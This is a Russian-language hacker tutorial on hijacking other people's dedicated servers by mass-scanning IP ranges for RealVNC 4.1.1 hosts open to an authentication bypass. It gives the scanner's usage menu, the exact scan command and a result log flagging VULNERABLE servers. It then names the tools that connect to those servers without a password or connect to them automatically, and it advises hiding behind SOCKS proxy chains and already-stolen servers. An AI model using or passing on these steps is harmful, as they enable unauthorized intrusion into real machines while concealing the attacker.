intro

Многие из нас задавались вопросом, как же добываются эти самые дедики?
На сайте Zloy.org появилась статья от Оптика, где он описывал способ
добавления пользователя (за что,ему огромнейший РЕСПЕКТ!!!) и один из
видов угона при помощи программы NTSCAN. В этой статье я хочу описать
немного другой способ угона.

способ №1

Прямые руки

Первое, что нам нужно - это прямые руки свежая или чуть пианайа голова =)
FreeCap - Предназначен для соксификации программ не умеющих работать с
прокси серверами самостоятельно. Пару SOCKS-проксов для безопасности, а
лучше цепочку . Здесь я небуду описывать принцип работы с этой программы
но вы знайте. что все действия я проделываю именно через нее...

Начнем.

Искать мы будем vnc-server т.е. Virtual Network Computing.
Первое что нам нужно это хороший VNC-сканер, я знаю 2 сканера:
это PHP-сканер от Гемаглобина и RealVNC Bypass Authentication Scanner
Свой выбор я оставил за RealVNC Bypass Authentication Scanner
т.к. он прост в использовании и реально ищет по диапазонам, а нам это и нужно.
Итак скачивакм данный сканер, распаковываем его к примеру: X:\XXX\ где
Х - буква вашего диска, а ХХХ - папка куда вы его распаковали. И запускаем из
cmd.exe Пример:
cd X:\XXX - переходим в папку со сканером
Х:\XXX\VNC.exe - запускаем сканер
где он нам выдаст следущую информацию:

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
X:\>VNC.exe

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
================================================== ==[win32]==
MAIN MENU
================================================== ===========

[+] Usage: VNC_bypauth <target> <scantype> <option>
[-] <target>:
___________________
|___-p____|___-i____|

[-] <scantype>:
____________________
|___-cT___|___-vnc___|
[-] <option>:
__________________________________________________ ______
|___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|

[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations
[+] To increase the speed under linux, try ulimit -s unlimited

X:\>

Осюда мы видим набор ключей по работе со сканером...
Вбиваем далее:
X:\XXX\VNC.exe -i XXX.XXX.XXX.XXX-XXX.XXX.XXX.XXX -p5900 -vnc
где: -i диапазон ip -р порт -vnc Виртуальные сервера
В то-же время в папке \ХХХ\ у нас появляется файл VNC_bypauth.txt
куда сохраняются все результаты программы. Открываем и видим:

---------------------------------------------------------------------------
COMMAND: VNC.exe -i xxx.xx.xxx.x-xxx.xxx.xxx.xxx -p 5900 -vnc
----------------------------------------------------------------------------
xxx.xx.xxx.xx :5900 vnc4: banned
xxx.xx.xxx.xx :5900 vnc4: nothing received
xxx.xx.xxx.x :5900 connection closed
xxx.xx.xxx.xxx :5900 vnc4: patched
xxx.xx.xxx.xxx :5900 vnc4: VULNERABLE
----------------------------------------------------------------------------
Scan complete
--------------------------------------------[heapoverflow.com 2004-2005]----

из результата видно что сканер понятным образом сохраняет результаты где бажные
сервера подписаны как VULNERABLE с такими мы и будем работать...
Теперь к нам на помощь приходит программа BL4CK-vncviewer-authbypass она
позволяет подключится к бажному серверу, на подобии
Подключение к удаленному рабочему столу(mstsc.exe)

Способ №2

Ищем и качаем программу DSNS v. 1.0 очень хороший между прочим сканер
портов . Вбиваем диапазон, порт и ждем... =) через некоторое время сканер
выдает нам фуеву тучу открытых портов =). После окончания скана схораняем
данный диапазон Results\Export results одним диапазоном без портов.
Теперь настала очередь программы VNCMASS в которую мы вбиваем только что
насканеные диапазоны и давим Start All прочекает и автоматический подключится
к бажным дедикакм... Фу-у-у-у... вроде всееее.... =)

з.ы. Советую работать с сканерами через дедики т.к. вбили диапазон и пошли спать, а
наутро подкл. и смотрим результаты.

з.ы.ы.ы Статья писалась в Декабре прошлого года, для своих ребят.

by te$t